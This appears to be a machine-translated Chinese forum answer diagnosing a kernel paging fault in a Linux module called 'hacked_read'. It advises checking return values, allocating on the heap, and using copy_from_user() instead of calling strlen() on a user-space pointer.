BUG: unable to handle kernel paging request at 00007fffc3497560
此外,指令指针位于:
RIP: 0010:hacked_read_test+0x42/0x80 [hacked_read]
最好的做法是反汇编函数并找到有问题的指令。
另外代码需要改进:
- 您需要检查 return 个值
- 您不应在堆栈上为内核模块分配数组。内核 space 的堆栈非常有限。您必须在堆上分配。
if ( strlen( buf ) > 0 )
您正在调用 strlen()
的论点是:
不在内核地址space
可能不指向 null-terminated 字符串
可能根本不指向映射内存
不要那样做。使用 read()
中的 return 值来确定读取了多少数据,并使用 copy_from_user()
从用户指针复制数据。